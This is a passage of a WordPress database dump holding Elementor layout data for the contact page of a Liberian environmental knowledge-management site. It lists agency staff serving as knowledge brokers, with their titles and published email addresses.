Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23095,3338,'_elementor_edit_mode','builder'),(23096,3338,'_elementor_template_type','wp-page'),(23097,3338,'_elementor_version','3.0.16'),(23098,3338,'_wp_page_template','default'),(23099,3338,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and 